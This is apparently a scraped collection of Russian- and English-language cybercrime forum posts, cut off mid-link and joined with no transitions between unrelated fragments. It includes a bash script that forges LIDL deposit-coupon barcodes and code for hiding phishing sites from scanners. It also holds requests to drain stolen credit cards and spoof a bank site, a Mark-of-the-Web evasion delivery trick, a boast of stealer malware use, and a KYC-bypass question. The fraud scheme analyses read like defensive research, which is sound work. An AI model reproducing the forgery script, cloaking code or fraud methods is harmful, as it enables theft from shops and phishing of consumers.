необходим для «прогрева» контрагента, то есть мошенники втираются в доверие,
ставя контрагента в «зависимое положение».
В ходе дальнейшего общения злоумышленники просят помощи в поиске доверенных продавцов криптовалюты. Они утверждают, что нуждаются в криптовалюте для покупки бриллиантов и золота в странах, где операции с наличными якобы затруднены. В числе таких стран, например, упоминалась Индия, но в связи с санкциями, когда Московская биржа, Национальный клиринговый центр (НКЦ) и Национальный расчетный депозитарий (НРД) были включены в SDN-лист США, а также с приостановкой биржей торгов долларом и евро, мы ожидаем и расширения географии легенды схемы на другие страны, с которыми есть торговые экономические связи.
Часто, когда продавцы криптовалюты всё же требовали предоплату, мошенники отказывались и выдвигали встречные условия.
Кража происходит в день, когда должна состояться сделка купли-продажи – должен
приехать курьер с наличными деньгами из банка. Однако за несколько часов до
назначенного для сделки времени злоумышленники запрашивают видеозвонок.
На видеозвонке они рассказывают, что им необходимо убедиться в «чистоте»
криптовалюты, что она не засветилась в нелегальных переводах, так как такие
переводы могут привезти к заморозке криптовалюты на счёте на бирже при попытке
вывода, или связать покупателя с каким-либо рассследуемым полицией уголовным
делом.
Процесс верификации заключается в том, что продавец криптовалюты должен перевести свои средства с одного адреса на другой. По словам покупателей (то есть злодеев), это делается для того, чтобы убедиться, что криптовалюта настоящая и что криптокошельки продавца не внесены в черный список. Именно во время этого процесса проверки криптовалюта продавцов и похищается.
Во время или после видеозвонка жертву под различными предлогами (например, чтобы доказать чистоту происхождения активов, или отсутствие его кошелька в черных списках) убеждают перевести криптовалюту на собственный уникальный адрес, добавив в конце ".eth".
В этот момент продавец обычно настроен скептически. Чтобы проверить безопасность просьбы покупателя для своих средств, продавец отправляет небольшую сумму денег (например, 100 USDT, 10 USDT) на свой_адрес.eth, который фактически является ENS-доменом и на самом деле ведёт на другой ETH –адрес. Тестовая сумма действительно поступает на на первоначальный адрес продавца криптовалюты, и он и переводит все оставшиеся средства на тот же домен ENS. Криптовалюта, переведенная в этой транзакции, уже не попадает к продавцу, а вместо этого она оказывается в кошельке злодея.
Дело в том, что после того, как продавец совершил первую транзакцию, показавшую, что криптовалюта реальна, мошенники немедленно регистрируют домен ENS идентичный адресу, с которого были отправлены деньги. ENS (служба именования Ethereum) — это распределенная система доменных имен, построенная на блокчейне Ethereum. Подобно тому, как DNS связывает доменное имя с IP- адресом, ENS связывает доменное имя с Ethereum-адресом. Владелец домена проверяется в первую очередь по его адресу в блокчейне. В нашем случае единственное различие в написании между адресом продавца и созданным доменом ENS заключается в наличии строки «.eth» в домене ENS. Зарегистрированный домен ENS будет указывать на криптоадрес злодея (а не продавца). Таким образом, когда продавец отправляет тестовую сумму в 10 USDT на ENS-адрес, покупатель (злодей) получает ее вместо него. Получив ее, он переводит ту же сумму на второй адрес продавца (не зная продавца) менее чем за 1 минуту.
Итак, со стороны продавца-жертвы, похоже, все в порядке, и он теперь доверяет покупателю. На основе этого доверия продавец отправляет оставшуюся сумму (обычно немалую) на свой первый(?) адрес (добавляя в конце «.eth» в соответствии с указаниями покупателя). Как объяснялось ранее, деньги окажутся в крипто-кошельке злодея, указанном в записях ENS. Записи ENS можно проверить, указав адрес ENS на сайте - https://app.ens.domains. Связанный криптоадрес можно увидеть на вкладке «Записи» («Records»), как показано на рисунке ниже. На этот раз злодей не будет переводить деньги на адрес продавца. Вместо этого он отправит средства на один из своих других криптокошельков, тем самым украв криптовалюту продавца. Через некоторое время продавец заметит, что так и не получил переведенные средства, но отменять транзакцию будет уже поздно.
Как и DNS-записи, ENS-записи могут быть изменены. То есть адрес, на который указывает домен ENS, может быть изменен его владельцем в любое время.
Просмотрев записи ENS, можно увидеть Ethereum-адрес злодея и, воспользовавшись тем же сайтом (app.ens.domains), получить список всех ENS доменов, которые были созданы с его использованием. Используя криптоадрес злодея, было обнаружено, что на него зарегистрировано несколько ENS-доменов, которые выглядят как действительные криптоадреса. Это означает, что злоумышленник, предположительно, нацелился на нескольких других продавцов криптовалют (жертв).
ENS-домены, зарегистрированные с использованием криптоадреса фишера
Отступление
В большинстве стран ЕС действует гос-програма, которая нацелена на охранену
окружающей среды.
Она функционирует за счет наогов и занимается разными областями и на самом
деле весьма полезна.
Основная-же ее задача, это переработка и/или повторное использование
продуктов: одежда, мебель, мусор, техника и тд.
Благодря этой програме, ЕС может вести экономическое сопротивление Азии.
Например, разная техника может переходить из рук в руки, что существенно
ограничивает торговлю с Китаем, Тайванем, Японией.
Вступление
Абсолютно в любом магазине, при покупке товара в бутылке с макером, стоимоcть
самой бутылки будет учтена при оплате.
Стоимоть завасит от метариала и
размера бутылки. Обычно это 25 центов (пластик, 0.25l).
Саму бутылкупосле использования можно вернуть обратно в магазин(за цену их
покупки), в автомат, который напечатает скидочный чек.
Компании обязаны иметь подоюбные автоматы, помомо этого, они получают бенефиты
за их содержание.
Претензии
При покупке идёт дополнитльная оплата самой бутылки, а возврат ее через
автомат дает купон на суму самой бутылки что была оплачена.
Заключение проблемы в том, что сам чек можно обналичить только в магазине/сети
где и был получен чек(купон)!
Означает это то, что покупатель уходит в 0, однако должен повторно постеить
эту торговую сеть для того, чтобы вернуть деньги за счёт покупки новых
товаров.
Из этого следует, что сам чек имеет отрицательный баланс.
Уязвимость
Проблема: данные о ценности самого чека есть только на чеке!
Пример будет работать с сетью магазинов LIDL, однако по такой-же самой
аналогии можно взломать любую другую сеть.
2012345612345123456
| | | |_______ Баланс
| | |______________Номер
| |______________________Локация
|_______________________Служебный байт
Данные есть только на чеке, а это значит, что их можно очень просто изменить.
Маленькая месть.
Отомстить толстосумам может каждый.
1. Сперва стоит купить любую минералку, после нещадно выпить ее и сдать в
автомат.
Из кода нужна только локация и номер. Локация обязательна, а номер можно
установить на тот, который будет еще не скоро. В будущем, у человека с этим
номером буду проблемы.
2. Далее можно получить сгенерированную картинку.
Зависимости: zint(для генерация баркода).
Bash:Copy to clipboard
#!/bin/bash
echo "Creating SAVING"
read -p "Enter code: " uinput
echo ""
if [[ ! $uinput =~ ^[0-9]{19}$ ]]; then
echo "Invalid"
else
trimmed="${uinput:2}"
location="${trimmed:0:6}"
number="${trimmed:6:-6}"
money="${trimmed: -6}"
if [ "$money" != "000000" ]; then
for ((i=0; i<3; i++)); do
if [ "${money:0:1}" != "0" ]; then
break
fi
money="${money#0*}"
done
if [ "${money: -2}" != "00" ]; then
money="${money:0:-2},${money: -2}"
fi
else
money="0"
fi
echo "Location: $location"
echo "Number: $number"
echo "Money: $money€"
money="${money//[^0-9]/}"
fi
echo ""
echo "Creating CHEQUE"
read -p "Enter Location: " ulocation
read -p "Enter Number: " unumber
read -p "Enter Money(in Cetns): " umoney
if [ -z "$ulocation" ]; then
ulocation=$location
fi
if [ -z "$unumber" ]; then
unumber=$number
fi
if [ -z "$umoney" ]; then
umoney=$money
fi
while [ ${#umoney} -lt 6 ]; do
umoney="0$umoney"
done
final="$ulocation$unumber$umoney"
echo "New code: 20$final"
bash -c "zint -o 20${final}.png -d \"(20)${final}\" --barcode=16 --gs1parens --gs1nocheck --notext"
3. Советую взять каротчки для амазона или других сервисов. На кассе просто
дайте телефон с баркодом.
4. Профит
I have a person inside a bank and he can provide me with credit cards with all the information; card details, billing address, credit limit, everything..
I'm looking for ideas to drain the credit cards, Any suggestion would be highly appreciated.
Всем доброго дня! Парни подскажите в каком направлении почитать (по копать) ?! Задача: Как с симулировать какой либо сайт на отдельно взятой машине. На пример у меня на компе жена выходит на сбер, всё как обычно, адрес тот же, выглядит также, платежи вроде как создаются и даже куда-то отправляются, а по факту это просто мулька и на сайт Сбера она с этой машины не выходит! Возможно ли такое осущиствить?
Привет всем! Ну, что, погнали дальше
Краткое описание :
**Макросы из интернета по умолчанию блокируются в Office. Об этом можно почитать тут ([тыц](https://learn.microsoft.com/en- us/deployoffice/security/internet-macros-blocked)). Таким способом можно запускать любой файл, даже .exe. Мотвы не будет, пакуем только в .zip и обязательно смотрите, чтобы на файле уже не было Motw, когда перетаскиваете его на SMB или WebDAV. Макрос из видео можно найти тут **[тыц](https://v3ded.github.io/redteam/abusing-lnk-features-for-initial- access-and-persistence).
**
](https://cloud.mail.ru/public/ziMp/85XPx3o7b)
Вам открыли доступ к файлу. Отправлено с помощью Облако Mail
cloud.mail.ru
**
У меня есть шаблоны нескольких сайтов , как клонов существующих так и нн
сервисов .
Где их лучше захостить , и как потом унести всё с карты зная номер,CVV,срок
действия,баланс ?
Сколько это примерно будет стоить ?
(Статья не для конкурса, а просто в помощь тем, кому эта информация может
оказаться полезной)
Фишинг остается одной из самых распространенных и опасных кибератак,
направленных на кражу учетных данных и другой конфиденциальной информации
пользователей.
Чтобы продлить время жизни сайта, скрыть его от поисковиков и специалиствов,
постоянно разрабатываются новые методы.
В этой статье мы рассмотрим основные методы, которые используются для
достижения этой цели.
1. Фильтрация по User-Agent
Фильтрация по User-Agent основана на анализе заголовка HTTP-запроса, который
указывает, какое устройство и браузер использует посетитель сайта. Если сайт
обнаруживает, что запрос исходит от бота поисковой системы (например,
Googlebot), он может отобразить безопасную или легитимную страницу. Это
предотвращает индексацию фишингового сайта поисковыми системами.
Пример:
Code:Copy to clipboard
user_agent = request.headers.get('User-Agent')
if 'Googlebot' in user_agent:
# Отправить безопасный контент
else:
# Показать фишинговую страницу
2. Белый и черный список IP-адресов
Также можно использовать белые и черные списки IP-адресов для управления
доступом к своим фишинговым сайтам. IP-адреса, принадлежащие известным
поисковым системам или организациям ИБ, могут быть заблокированы или
перенаправлены на безопасный контент.
Пример:
Code:Copy to clipboard
ip_address = request.remote_addr
if ip_address in known_search_engine_ips:
# Отправить безопасный контент
else:
# Показать фишинговую страницу
3. Проверка заголовка Referrer
Заголовок Referrer указывает, откуда пришел пользователь. Можно проверять этот
заголовок, чтобы убедиться, что переход был выполнен из правильного источника,
например, из фишингового письма. Если переход выполнен напрямую или из другого
источника, сайт показывает безопасную страницу.
Пример:
Code:Copy to clipboard
referrer = request.headers.get('Referer')
if referrer == expected_referrer:
# Показать фишинговую страницу
else:
# Отправить безопасный контент
4. Перенаправление на основе JavaScript
Еще одним способом является использование JavaScript для перенаправления
пользователей на фишинговый сайт только при выполнении определенных условий.
Боты, как правило, не выполняют JavaScript, что позволяет скрыть фишинговый
контент от них.
Пример:
Code:Copy to clipboard
<script>
if (document.referrer == expected_referrer) {
window.location.href = "phishing_page.html";
}
</script>
5. Аутентификация на основе куки
Использование уникальных куки и ссылки, которые отправляются с фишинговым
письмом. При переходе по уникальной ссылке эти куки устанавливаются, и сайт
проверяет их наличие при каждом последующем запросе. Если куки отсутствуют,
отображается безопасная страница.
Пример:
Code:Copy to clipboard
cookie = request.cookies.get('phishing_cookie')
if cookie == expected_cookie_value:
# Показать фишинговую страницу
else:
# Отправить безопасный контент
Заключение
Чтобы скрыть свои фишинговые сайты от поисковых систем и исследователей
кибербезопасности можно использовать: фильтрацию по User-Agent, белые и черные
списки IP-адресов, проверка заголовка Referrer, перенаправление на основе
JavaScript и аутентификация на основе куки - все эти методы помогают избежать
обнаружения.
_Hello everyone, I want to share with you a screenshot of an email I accessed
after my first, successful malware attack,
to start with all this, I got user and password of the mail of the police of a
country that I can not name at least for now, after that I prepared my stealer
and an office document that downloaded and executed the stealer, including
other malware but apparently the backdoor was detected, although even so the
stealer was executed successfully, and I managed to get mail credentials of
the same company to which I had access, but in this case another user and
password, plus access to another web platform that is not the mail.
_
Хочу научится обходить KYC при регистрации всяких забугорных сервисов, есть
Android устройство, если кто то в теме подскажите как правильно сейчас это
делают ?
Знаю что есть всякие фреймворки и виртуальные камеры и так далее, для подмены
изображения при открытии обычной камеры, но по моему они детектятся как и
наличие рут прав. Есть мысль использовать проектор но боюсь что будет палевно.
В общем и целом подскажите куда копать, буду очень благодарен
очередной сборник
-7Drop
-Amazon
-APowerREC
-Bank
-bet365
-Bibles
-Bots
-Carding for Noobs
-Cracking
-Credit Card
-Crypto
-Discord
-Door Dash
-Dork
-Ebay
-Ebooks
-Email
-Epic Games
-Facebook
-Firefox
-Flipkart
-Food
-Gift cards
-Google
-Gucci
-Hotmail
-Instagram
-JBL
-Linux
-Mega. nz
-Method Packs
-Money
-Netflix
-Nike
-Packages
-PayPal
-Phishing
-Phone Numbers
-Roblox
-Snapchat
-Spotify
-Steam
-Swat
-TikTok
-Value Prestige
-Walmart
-Wifi
-Windows
-XBOX
-YouTube
-4letterusernames
-70$ IN JUST 24 HOURS FULLY AUTOPILOT METHOD ( 2021 )
-Access JEE & NEET Premium Lecture For Free
-Calvin Klein
-Dell Monitor Basic RMA
-Dior shoes
-Free Hosting
-G2A_Free_Amazon_GC
-GUIDE ON How To Surf Safely On Public WiFi
-How do the hackers hide their IP address while hacking
-How to be Anonym on Android
-How to change your voice during any conversation
-How to clone SIM Card. txt
-how to download every photo
-HOW TO GET FREE DOMAINS
-HOW TO GET FREE KEYS FOR ANTIVIRUS, WINDOWS, STEAM
-How To Get IP's Through The Steam Client
-How to get IPs. txt
-How To Kick Everyone From A Counter Strike Source Server
-How to Kill your Enemys Phone
-How to Recover Data From Corrupted OS Latest Method
-HOW TO SAFELY BROWSE DEEP WEB COMPLETE GUIDE
-How to Score free Nike Gift Card. txt
-How to stay 100% anonymous on the internet
-How to unsubscribe all YouTube channel at once
-how to use the same cracked account even if the owner changed password
-HQ Tutorial To Use The Same Cracked Account Even If -The Owner Changed It's Password
-MAKE LOGOS FOR FREE. txt
-Nuke for Dark Web sites
-Own Proxy Service for free
-PDF Password Remover Tools To Crack PDF Passwords Easily
-proxylist
-Skillshare 2 Months free
-software ethical hacking
-The Ultimate Guide -Proxies & Vpns
Мошенничество на досках объявлений и торговых площадках превратилось в серьезную проблему из-за появления организованных преступных группировок. Они работают по модели «мошенничество как услуга» (Fraud-as-a-Service), постоянно совершенствуя схемы кражи денег и персональных данных у доверчивых пользователей.
Существуют две основные схемы обмана:
В обоих случаях после перехода по ссылке откроется фишинговый сайт — почти точная копия настоящего сайта торговой площадки или платежного сервиса. С единственным отличием: все данные, которые вы там введете, попадут в руки мошенников. Далее мы подробно рассмотрим схему scam 2.0, нацеленную на продавцов.
У мошенников есть несколько критериев отбора потенциальных жертв. В первую очередь их интересуют объявления, за продвижение которых продавец заплатил. Такие объявления обычно отображаются на первых позициях поиска и имеют специальную отметку. С точки зрения мошенника, они привлекательны по двум причинам: во-первых, у продавца, оплатившего продвижение, с большей вероятностью есть деньги. Во-вторых, такой продавец может быть заинтересован в ускоренном поиске покупателей.
Помимо отметки о продвижении злоумышленники смотрят на фотографии в объявлении. Если снимки высокого качества и кажется, будто их сделали на фотосессии, скорее всего, это предложение магазина. Такие объявления мошенникам не интересны.
Наконец, злоумышленники ищут продавцов, которые используют сторонние мессенджеры и готовы предоставить номер телефона. Это выясняют уже на стадии общения с продавцом.
Основная цель злоумышленника — убедить жертву перейти по фишинговой ссылке и ввести платежные данные. Как и любой покупатель, мошенник начинает общение с приветствия и уточнения, актуально ли еще предложение. После этого он задает продавцу различные вопросы о товаре, например в каком он состоянии, давно ли продавец его приобрел, почему решил продать и так далее. Опытные скамеры задают жертве не более трех вопросов, чтобы не вызвать подозрений.
Затем злоумышленник говорит, что товар его устраивает, но он не может забрать его лично и оплатить наличными, потому что, например, находится в другом городе (тут мошенник может указать любую причину, на которую хватит фантазии), после чего спрашивает, удобно ли будет воспользоваться доставкой с «безопасным платежом».
Чтобы у продавца не возникало вопросов, мошенник подробно объясняет схему оплаты приблизительно следующим образом.
Если жертва начинает спорить и настойчиво отказываться от такого способа оплаты, мошенник пропадает, так как не хочет терять время. Если продавец просит продолжить переписку на официальном сайте торговой площадки, злоумышленник делает вывод, что он знает о мошенничестве и вряд ли перейдет по фишинговой ссылке, поэтому также перестает отвечать и начинает искать новую жертву.
Если же жертва переходит по фишинговой ссылке и вводит платежные данные, мошенники снимают с ее карты все доступные средства. Стоимость товара при этом не имеет значения: даже если продавец указал в объявлении незначительную сумму, злоумышленники спишут все, что успеют.
В схеме scam 2.0 есть два основных варианта фишинговых страниц: одни представляют собой копии страницы торговой площадки с объявлением жертвы, другие имитируют сервисы безопасной оплаты, такие как Twin. Ниже приведен пример фишингового объявления и оригинал на официальном сайте.
[![Фишинговое
объявление](/proxy.php?image=https%3A%2F%2Fmedia.kasperskycontenthub.com%2Fwp-
content%2Fuploads%2Fsites%2F58%2F2024%2F05%2F24200050%2FMessage_boards_in_scam_01-1024x800.png&hash=81341318e9de5b1e005774c23b7b96c7)](https://media.kasperskycontenthub.com/wp-
content/uploads/sites/58/2024/05/24200050/Message_boards_in_scam_01.png)
Фишинговое объявление
[![Оригинальное
объявление](/proxy.php?image=https%3A%2F%2Fmedia.kasperskycontenthub.com%2Fwp-
content%2Fuploads%2Fsites%2F58%2F2024%2F05%2F24200114%2FMessage_boards_in_scam_02.png&hash=6d51e576216e7d9fa4acdbe1939865f9)](https://media.kasperskycontenthub.com/wp-
content/uploads/sites/58/2024/05/24200114/Message_boards_in_scam_02.png)
Оригинальное объявление
Как можно видеть, злоумышленники практически полностью копируют интерфейс
торговой площадки. Поддельная страница отличается от оригинальной лишь
незначительными деталями. В частности, вместо кнопки Inserent kontaktieren
(«Связаться с автором объявления») на фишинговой странице присутствует кнопка
Receive 150 CHF («Получить 150 швейцарских франков»). Если нажать эту кнопку,
откроется страница с формой ввода платежных данных.
[![Фишинговые страницы
оплаты](/proxy.php?image=https%3A%2F%2Fmedia.kasperskycontenthub.com%2Fwp-
content%2Fuploads%2Fsites%2F58%2F2024%2F05%2F24200145%2FMessage_boards_in_scam_03-745x1024.png&hash=4b88ab6a81f7aa691e1598261ffe5c1f)](https://media.kasperskycontenthub.com/wp-
content/uploads/sites/58/2024/05/24200145/Message_boards_in_scam_03.png)
Фишинговые страницы оплаты
Если по изначальной ссылке открывается копия сервиса безопасных платежей, то
форма ввода данных карты отображается прямо на этой странице — без
дополнительных переходов.
В последнее время появились целые группировки мошенников, которые специализируются на досках объявлений. Они практикуют оба варианта мошенничества (scam 1.0 и scam 2.0) и объединяют в своих рядах организаторов, поддержку и рядовых участников.
Мы подробно изучили деятельность одной из группировок, нацеленной на пользователей досок объявлений из Швейцарии. На ее примере мы покажем, как устроена деятельность таких структур изнутри.
В состав группировки могут входить следующие роли.
Из прочего лексикона мошенников стоит выделить еще несколько терминов.
Группировки общаются в закрытых группах и каналах в Telegram, где ищут новых воркеров, поддерживают ботов для создания фишинговых ссылок, отслеживают переходы по отправленным ссылкам и ведут статистику по каждому кейсу, по прибыли отдельных воркеров и группировки в целом.
Группировки работают по модели «мошенничество как услуга», в которой основным потребителем услуг является воркер. Организаторы обеспечивают функционирование сервисов (каналы/чаты/боты в Telegram, фишинговые сайты, обработка платежей, отмывание и вывод средств), предоставляют моральную поддержку и мануалы по ворку, а взамен забирают себе комиссию с каждого платежа.
Мошенничество вида scam 1.0 и scam 2.0 появилось несколько лет назад, и обе схемы до сих пор можно встретить на русскоязычных досках объявлений. Но скам, направленный на российский сегмент, среди опытных мошенников считается устаревшим, поскольку российские пользователи уже осведомлены о схемах обмана и высок риск, что злоумышленников найдут и арестуют. Поэтому скамеры переключаются на другие страны.
Исследуемая нами группировка нацелена преимущественно на Швейцарию. В своем чате мошенники отмечают, что такой выбор связан с меньшим риском обнаружения и тем, что пользователи из этой страны мало знакомы с данным видом скама. Кроме того, прежде чем размещать объявления или откликаться на них, скамер интересуется рынком страны и основными фактами о ней — например, на каких языках и диалектах говорят ее жители. Это требуется для того, чтобы понимать, на каком языке обращаться к жертве, чтобы вызвать у нее больше доверия. В Швейцарии, [по данным на 2023 год](https://www.eda.admin.ch/aboutswitzerland/en/home/gesellschaft/sprachen/die- sprachen---fakten-und-zahlen.html), свыше 2/3 населения в возрасте 15 лет и старше используют для общения не менее двух языков.
Также исследуемая группировка действует в Канаде, Австрии, Франции и Норвегии.
Мы проанализировали инструкции, которые группировка предоставляет новым воркерам, и выяснили, с чего начинается работа мошенников. Первым делом воркер покупает на теневых ресурсах аккаунты на досках объявлений, где в дальнейшем будет искать жертв. Злоумышленники покупают учетные записи, а не создают новые, поскольку регистрация на площадке несет в себе больше рисков. После этого воркер создает аккаунт в стороннем мессенджере для общения с жертвой: некоторые пользователи сами просят номер для того, чтобы связаться в мессенджере, в других случаях это предлагает воркер, чтобы снизить риск бана аккаунта на торговой площадке. Для регистрации используют виртуальные номера телефонов.
На следующем этапе воркер ищет прокси-сервер, с помощью которого он обеспечит себе анонимность и конфиденциальность. При соединении через сервер торговая площадка видит IP-адрес и прочие данные этого сервера, что позволяет скрыть идентификационные данные злоумышленника. При этом хорошими считаются прокси, при работе через которые аккаунт не банят сразу после регистрации. Так, если воркер будет работать с VPN, то его аккаунты будут очень быстро банить: подключение через VPN подразумевает частую смену IP-адреса и геолокации, отчего площадки часто принимают такие аккаунты за ботов.
Помимо инструкций по подготовительной работе, в мануале для новичка более опытные участники группировки делятся шаблонами, которые начинающий воркер может использовать в диалоге с жертвой, чтобы уговорить ее на сделку и успокоить, если у нее возникнут опасения по поводу предложенного способа оплаты.
Также в мануале содержатся инструкции по обходу введенных площадками ограничений. Доски объявлений постоянно обновляются и улучшают внутреннюю систему безопасности, поэтому воркерам все сложнее использовать привычные формулировки при общении с жертвами. Например, с ноября 2023 года одна из известных площадок отказалась от проведения платежей через Tripartie — популярную в Швейцарии платформу для безопасных сделок — и начала блокировать аккаунты за частое упоминание этой системы. Чтобы обойти это ограничение, воркеры пишут Tripartie с опечатками, например «теряют» символы или заменяют их другими. Более опытные воркеры используют кириллицу, чтобы сделать название платежной системы нечитаемым для защитных систем площадки.
Если продавец ввел данные своей карты, воркер передает их вбиверу, который снимает с карты средства в пределах установленных лимитов. Делает он это различными способами: приобретает технику, переводит деньги на электронные кошельки, такие как PayPal, и так далее. Также вбивер пытается оформить на владельца карты кредит, взять займ или открыть вклад. Для этого он использует онлайн-банки, которые не требуют подтверждения по SMS. При этом некоторые из них просят прислать скан паспорта — на этот случай у вбивера есть данные паспортов, украденные или взятые у людей без определенного места жительства. Хотя эти данные не имеют отношения к владельцу украденной карты, онлайн-банки не всегда проверяют, принадлежат ли паспорт и карта одному человеку — на это и рассчитывают мошенники.
Для упрощения работы воркеров у группировки есть фишинговый Telegram-бот. Он позволяет автоматизировать процесс создания фишинговой страницы и общения с жертвой, а также отслеживать успехи мошенника. На главной странице бота находятся кнопки для создания фишинговой ссылки, просмотра личного профиля, быстрого перехода в чаты и каналы группировки, а также кнопка настроек.
[![Главная страница
бота](/proxy.php?image=https%3A%2F%2Fmedia.kasperskycontenthub.com%2Fwp-
content%2Fuploads%2Fsites%2F58%2F2024%2F05%2F24200231%2FMessage_boards_in_scam_04.png&hash=54ffbd7bf7865cfc5d567327eb5a21c3)](https://media.kasperskycontenthub.com/wp-
content/uploads/sites/58/2024/05/24200231/Message_boards_in_scam_04.png)
Главная страница бота
При нажатии кнопки создания фишинговой страницы появляется возможность выбрать
страну, для которой будет создана уникальная ссылка.
[![Кнопка выбора
региона](/proxy.php?image=https%3A%2F%2Fmedia.kasperskycontenthub.com%2Fwp-
content%2Fuploads%2Fsites%2F58%2F2024%2F05%2F24200304%2FMessage_boards_in_scam_05.png&hash=1c960dfd1a6056eb148878020461eb2e)](https://media.kasperskycontenthub.com/wp-
content/uploads/sites/58/2024/05/24200304/Message_boards_in_scam_05.png)
Кнопка выбора региона
Далее воркер указывает название товара, который заинтересовал жертву (если
жертва — покупатель) или который разместила жертва (если жертва — продавец).
[![Выбор названия
товара](/proxy.php?image=https%3A%2F%2Fmedia.kasperskycontenthub.com%2Fwp-
content%2Fuploads%2Fsites%2F58%2F2024%2F05%2F24200334%2FMessage_boards_in_scam_06.png&hash=0d13c59e123cbc290590781422446013)](https://media.kasperskycontenthub.com/wp-
content/uploads/sites/58/2024/05/24200334/Message_boards_in_scam_06.png)
Выбор названия товара
Эти данные воркер вводит, чтобы бот создал полную копию оригинального
объявления, но уже на фишинговой странице. Также воркер загружает в бот
фотографию, стоимость, описание и другую информацию из объявления, чтобы у
жертвы создалось впечатление, что она находится на оригинальной странице.
После заполнения всех данных бот предоставляет фишинговые ссылки для всех доступных досок объявлений на всех релевантных для страны языках и для обоих вариантов мошенничества (скама продавцов и скама покупателей). Затем воркер выбирает нужную ему ссылку.
[![Выбор созданной
ссылки](/proxy.php?image=https%3A%2F%2Fmedia.kasperskycontenthub.com%2Fwp-
content%2Fuploads%2Fsites%2F58%2F2024%2F05%2F24200402%2FMessage_boards_in_scam_07-1024x965.png&hash=e470e0a8c000a665e05a161db988a2ac)](https://media.kasperskycontenthub.com/wp-
content/uploads/sites/58/2024/05/24200402/Message_boards_in_scam_07.png)
Выбор созданной ссылки
Здесь же мошенник может отправить жертве сообщение на почту, в мессенджер или
по SMS. Контактные данные злоумышленник получает из профиля жертвы на площадке
или выманивает в личной беседе.
[![Выбор действий с
объявлением](/proxy.php?image=https%3A%2F%2Fmedia.kasperskycontenthub.com%2Fwp-
content%2Fuploads%2Fsites%2F58%2F2024%2F05%2F24200432%2FMessage_boards_in_scam_08-874x1024.png&hash=80a2a66384cafe5f598682f4e5fde01c)](https://media.kasperskycontenthub.com/wp-
content/uploads/sites/58/2024/05/24200432/Message_boards_in_scam_08.png)
Выбор действий с объявлением
После успешно проведенной фишинговой атаки воркер может просмотреть в боте
свой профиль, в котором отображена его личная информация: ID, ник, баланс
карты и сумма, заработанная как лично воркером, так и всей группировкой.
[![Данные личного
профиля](/proxy.php?image=https%3A%2F%2Fmedia.kasperskycontenthub.com%2Fwp-
content%2Fuploads%2Fsites%2F58%2F2024%2F05%2F24200458%2FMessage_boards_in_scam_09.png&hash=e19dcb1dc55a788dca6487f5ecfe9e6c)](https://media.kasperskycontenthub.com/wp-
content/uploads/sites/58/2024/05/24200458/Message_boards_in_scam_09.png)
Данные личного профиля
Бот также предоставляет возможность напрямую обратиться к наставнику и
получить дополнительный заработок по схеме «приведи друга».
[![Инструменты
бота](/proxy.php?image=https%3A%2F%2Fmedia.kasperskycontenthub.com%2Fwp-
content%2Fuploads%2Fsites%2F58%2F2024%2F05%2F24200525%2FMessage_boards_in_scam_10.png&hash=06b351ef61c867a5d665941aa0b5e138)](https://media.kasperskycontenthub.com/wp-
content/uploads/sites/58/2024/05/24200525/Message_boards_in_scam_10.png)
Инструменты бота
Фишинговые ссылки, которые исследуемая группировка создает с помощью Telegram- бота, построены по одной схеме:
Домен чаще всего содержит часть или полное название доски объявления, которую копирует фишинговая страница, но это необязательная составляющая.
Информация о языках может меняться и зависит от страны, на которую направлен фишинг. Например, для Швейцарии существуют такие варианты: en, it, fr, de.
Действие — это то, что должна якобы совершить жертва: оплатить товар или получить платеж. Этот элемент принимает одно из двух значений: pay — если мошенник выступает в роли продавца, или receive — если мошенник выступает в роли покупателя.
Фишинговая ссылка всегда заканчивается цифрами — это номер объявления, полная копия оригинального.
[![Примеры фишинговых
ссылок](/proxy.php?image=https%3A%2F%2Fmedia.kasperskycontenthub.com%2Fwp-
content%2Fuploads%2Fsites%2F58%2F2024%2F05%2F24200550%2FMessage_boards_in_scam_11.png&hash=fe0b084c78e307d4854519f7bc921532)](https://media.kasperskycontenthub.com/wp-
content/uploads/sites/58/2024/05/24200550/Message_boards_in_scam_11.png)
Примеры фишинговых ссылок
Telegram-боты группировок постоянно совершенствуются и обновляются. В них добавляют полезную для воркеров информацию и расширяют арсенал инструментов автоматизации.
Например, в исследуемом Telegram-боте за период наблюдения появилась информация о доходах группировки за день и за все время существования, а также информация о доходах воркера за неделю и месяц.
[![Информация из профиля
пользователя](/proxy.php?image=https%3A%2F%2Fmedia.kasperskycontenthub.com%2Fwp-
content%2Fuploads%2Fsites%2F58%2F2024%2F05%2F24200621%2FMessage_boards_in_scam_12.png&hash=069638b6758b606385afe85682650ad0)](https://media.kasperskycontenthub.com/wp-
content/uploads/sites/58/2024/05/24200621/Message_boards_in_scam_12.png)
Информация из профиля пользователя
Также с очередным обновлением стала доступна подробная информация о
наставниках и их загруженности. Всего в группировке пять наставников, к
которым прикреплено в общей сложности больше 300 воркеров. На момент написания
статьи в чате мошенников в Telegram было более 10 000 участников.
Наставниками могут стать самые опытные воркеры, сумма профитов которых превышает 20 000 евро. Для этого они подают заявку на рассмотрение главному наставнику. Наставники получают процент от выручки ученика. Размер комиссии наставник устанавливает сам и увеличивает с опытом.
[![Система
наставничества](/proxy.php?image=https%3A%2F%2Fmedia.kasperskycontenthub.com%2Fwp-
content%2Fuploads%2Fsites%2F58%2F2024%2F05%2F24200647%2FMessage_boards_in_scam_13.png&hash=44d364648925adb6ccec0d098a4c97fc)](https://media.kasperskycontenthub.com/wp-
content/uploads/sites/58/2024/05/24200647/Message_boards_in_scam_13.png)
Система наставничества
Помимо изменения интерфейса произошло и обновление способа создания ссылок —
расширился список платформ, на которые нацелен фишинг.
[![Платформы для
фишинга](/proxy.php?image=https%3A%2F%2Fmedia.kasperskycontenthub.com%2Fwp-
content%2Fuploads%2Fsites%2F58%2F2024%2F05%2F24200717%2FMessage_boards_in_scam_14-585x1024.png&hash=7b53985fc2ca5dc31a08b33a617cc59b)](https://media.kasperskycontenthub.com/wp-
content/uploads/sites/58/2024/05/24200717/Message_boards_in_scam_14.png)
Платформы для фишинга
Ссылка из бота ведет на фишинговый сайт, адрес которого может отличаться от оригинала всего одной буквой. Страница представляет собой полную копию оригинального объявления с логотипом сайта, названием, ценой и описанием товара, который заинтересовал жертву.
[![Фишинговое объявление, нацеленное на обман покупателя. Для продавца
страница будет такой же, но вместо Pay на кнопке будет написано
Receive](/proxy.php?image=https%3A%2F%2Fmedia.kasperskycontenthub.com%2Fwp-
content%2Fuploads%2Fsites%2F58%2F2024%2F05%2F24200744%2FMessage_boards_in_scam_15.png&hash=3c3a2f2084dbef2ecd4265344c736d99)](https://media.kasperskycontenthub.com/wp-
